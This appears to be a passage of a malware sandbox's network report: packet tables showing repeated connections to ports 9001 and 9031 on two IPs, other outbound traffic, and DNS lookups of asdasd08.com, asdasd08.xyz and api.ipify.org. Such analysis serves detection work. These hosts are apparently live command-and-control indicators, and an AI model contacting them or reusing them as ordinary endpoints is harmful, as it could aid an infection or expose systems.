                          Dec 11, 2022 09:26:41.543678045 CET90314974084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.543873072 CET497409031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.544306993 CET90314974084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.544416904 CET497409031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.559448004 CET497409031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.570255041 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:41.603012085 CET90314974084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.604135036 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:41.607744932 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:41.623847008 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.652467012 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:41.667804003 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.668641090 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.668864965 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.713872910 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.714632034 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.715048075 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.716059923 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.716100931 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.716166973 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.716228962 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.730437994 CET497419031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.744571924 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:41.774661064 CET90314974184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.833746910 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:41.850171089 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:41.931145906 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:41.955128908 CET497429031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:41.980798006 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:41.999640942 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:41.999872923 CET497429031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.000152111 CET497429031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.044692993 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.045800924 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.046381950 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.046577930 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.046713114 CET497429031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.062057018 CET497429031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.075402975 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.105635881 CET90314974284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.112426043 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.137089968 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.168175936 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.181202888 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.181591034 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.181884050 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.226342916 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.227605104 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.227729082 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.227880955 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.228029966 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.228092909 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.262921095 CET497439031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.273514986 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.306420088 CET90314974384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.419389009 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.439673901 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.546411991 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.547437906 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.666366100 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.669466019 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.675165892 CET497449031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.719557047 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.719763041 CET497449031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.720216036 CET497449031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.764897108 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.765985966 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.766371012 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.766773939 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.766936064 CET497449031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.800493956 CET497449031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.811454058 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.844959021 CET90314974484.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.845637083 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.848678112 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:42.864495039 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.902780056 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:42.908905029 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.912534952 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.918173075 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.962435961 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.963726044 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.963913918 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.964994907 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.965385914 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:42.965562105 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.965562105 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.987791061 CET497459031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:42.998514891 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.031573057 CET90314974584.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.077486038 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.092710972 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.168571949 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.169500113 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.243911028 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.247232914 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.252861023 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.296967030 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.300524950 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.300738096 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.346406937 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.347373962 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.347697973 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.347763062 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.347956896 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.348018885 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.363095045 CET497469031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.374159098 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.407032967 CET90314974684.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.407713890 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.408938885 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.426537037 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.465111971 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.471343040 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.471569061 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.471806049 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.515862942 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.516797066 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.517189980 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.517353058 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.517627954 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.517693043 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.532962084 CET497479031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.544285059 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.576735020 CET90314974784.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.605737925 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.621819019 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.730537891 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.731719017 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.795907021 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:43.797986984 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.819709063 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.864633083 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.868556023 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.868915081 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.913682938 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.934664965 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.934843063 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.934932947 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.935266972 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:43.935333967 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.955244064 CET497489031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:43.966536045 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:43.999198914 CET90314974884.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.000663996 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.003662109 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.024919987 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.043339014 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.069140911 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.069319010 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.069683075 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.117803097 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.119119883 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.119205952 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.120121956 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.120204926 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.120565891 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.120620012 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.121510983 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.121575117 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.145704031 CET497499031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.158725977 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.189328909 CET90314974984.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.213427067 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.258608103 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.313126087 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.321814060 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.375911951 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.378149986 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.386367083 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.430540085 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.430802107 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.431454897 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.476195097 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.484287024 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.484396935 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.485508919 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.485596895 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.485801935 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.485881090 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.501173019 CET497509031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.511548042 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.545042992 CET90314975084.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.545906067 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.549190044 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.569199085 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.590270042 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.614186049 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.614423037 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.615205050 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.659043074 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.659997940 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.660382032 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.660455942 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.660809994 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.660866976 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.676335096 CET497519031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:44.687920094 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.720248938 CET90314975184.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:44.754767895 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.769730091 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.834691048 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.835629940 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:44.898545027 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:44.949666023 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.117259979 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:45.117974997 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.121864080 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.165908098 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.166029930 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.166342020 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.213135004 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.214689016 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.215053082 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.215137959 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.215481043 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.215549946 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.230364084 CET497529031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.241658926 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.273332119 CET90314975284.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.275635004 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:45.279022932 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:45.294694901 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.324655056 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.339333057 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.339446068 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.339710951 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.384524107 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.385582924 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.385998011 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.386063099 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.386708021 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.386797905 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.406357050 CET497539031192.168.2.384.144.111.46
                          Dec 11, 2022 09:26:45.416913986 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.450493097 CET90314975384.144.111.46192.168.2.3
                          Dec 11, 2022 09:26:45.600707054 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:45.616774082 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:45.815568924 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:45.816765070 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:46.050390005 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:46.111815929 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:46.113873959 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:46.118319988 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:46.153305054 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:46.153630018 CET90014973984.62.245.6192.168.2.3
                          Dec 11, 2022 09:26:46.153753996 CET497399001192.168.2.384.62.245.6
                          Dec 11, 2022 09:26:46.181663990 CET497544039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.349020004 CET40394975434.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.351825953 CET497544039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.352557898 CET497544039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.518830061 CET40394975434.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.520083904 CET40394975434.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.520342112 CET497544039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.520505905 CET497544039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.543919086 CET497554039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.686471939 CET40394975434.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.711497068 CET40394975534.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.712984085 CET497554039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.714247942 CET497554039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.880579948 CET40394975534.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.881377935 CET40394975534.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:46.881547928 CET497554039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.882019997 CET497554039192.168.2.334.171.171.32
                          Dec 11, 2022 09:26:46.914410114 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:26:46.914468050 CET4434975664.185.227.156192.168.2.3
                          Dec 11, 2022 09:26:46.914566994 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:26:46.915613890 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:26:46.915656090 CET4434975664.185.227.156192.168.2.3
                          Dec 11, 2022 09:26:47.048106909 CET40394975534.171.171.32192.168.2.3
                          Dec 11, 2022 09:26:56.904728889 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:26:56.938946962 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:56.939013958 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:56.939094067 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:56.940105915 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:56.940156937 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:56.946917057 CET4434975664.185.227.156192.168.2.3
                          Dec 11, 2022 09:26:57.369183064 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.369420052 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:57.376995087 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:57.377032042 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.377470016 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.378751040 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:57.378787041 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.513724089 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.513828993 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.513912916 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:57.514909983 CET49757443192.168.2.323.128.64.141
                          Dec 11, 2022 09:26:57.514941931 CET4434975723.128.64.141192.168.2.3
                          Dec 11, 2022 09:26:57.517896891 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:57.543567896 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:26:57.543709040 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:57.544032097 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:57.794470072 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:58.107022047 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:58.716414928 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:26:59.919744968 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:01.122922897 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:02.326112986 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:04.385442019 CET4434975664.185.227.156192.168.2.3
                          Dec 11, 2022 09:27:04.385672092 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:27:04.385672092 CET49756443192.168.2.364.185.227.156
                          Dec 11, 2022 09:27:04.732702971 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:07.636111975 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:07.636687994 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:07.636723042 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:07.636810064 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:07.658849955 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:07.658931017 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:07.659024000 CET4975880192.168.2.386.59.21.38
                          Dec 11, 2022 09:27:07.948165894 CET804975886.59.21.38192.168.2.3
                          Dec 11, 2022 09:27:08.266271114 CET804975886.59.21.38192.168.2.3
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 11, 2022 09:25:03.649156094 CET5986953192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:03.753731966 CET53598698.8.8.8192.168.2.3
                          Dec 11, 2022 09:25:04.128206015 CET5439753192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:04.234843969 CET53543978.8.8.8192.168.2.3
                          Dec 11, 2022 09:25:04.622323990 CET5932453192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:04.640944004 CET53593248.8.8.8192.168.2.3
                          Dec 11, 2022 09:25:50.584799051 CET5799053192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:50.689662933 CET53579908.8.8.8192.168.2.3
                          Dec 11, 2022 09:25:51.055361032 CET5238753192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:51.164469957 CET53523878.8.8.8192.168.2.3
                          Dec 11, 2022 09:25:51.529150009 CET5692453192.168.2.38.8.8.8
                          Dec 11, 2022 09:25:51.547856092 CET53569248.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:31.319788933 CET6062553192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:31.424376965 CET53606258.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:31.770284891 CET4930253192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:31.786986113 CET53493028.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:32.139075041 CET5397553192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:32.155718088 CET53539758.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:46.160582066 CET5113953192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:46.179779053 CET53511398.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:46.525403023 CET5295553192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:46.542290926 CET53529558.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:46.893528938 CET6058253192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:46.912317991 CET53605828.8.8.8192.168.2.3
                          Dec 11, 2022 09:26:56.916266918 CET5713453192.168.2.38.8.8.8
                          Dec 11, 2022 09:26:56.935348988 CET53571348.8.8.8192.168.2.3
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Dec 11, 2022 09:25:03.649156094 CET192.168.2.38.8.8.80x4bdcStandard query (0)asdasd08.comA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.128206015 CET192.168.2.38.8.8.80x52aeStandard query (0)asdasd08.xyzA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.622323990 CET192.168.2.38.8.8.80xb488Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:50.584799051 CET192.168.2.38.8.8.80xacb3Standard query (0)asdasd08.comA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.055361032 CET192.168.2.38.8.8.80xc8ccStandard query (0)asdasd08.xyzA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.529150009 CET192.168.2.38.8.8.80x4a8eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:31.319788933 CET192.168.2.38.8.8.80xcd44Standard query (0)asdasd08.comA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:31.770284891 CET192.168.2.38.8.8.80xef64Standard query (0)asdasd08.xyzA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:32.139075041 CET192.168.2.38.8.8.80xd059Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.160582066 CET192.168.2.38.8.8.80xdb49Standard query (0)asdasd08.comA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.525403023 CET192.168.2.38.8.8.80x7d7bStandard query (0)asdasd08.xyzA (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.893528938 CET192.168.2.38.8.8.80xabccStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
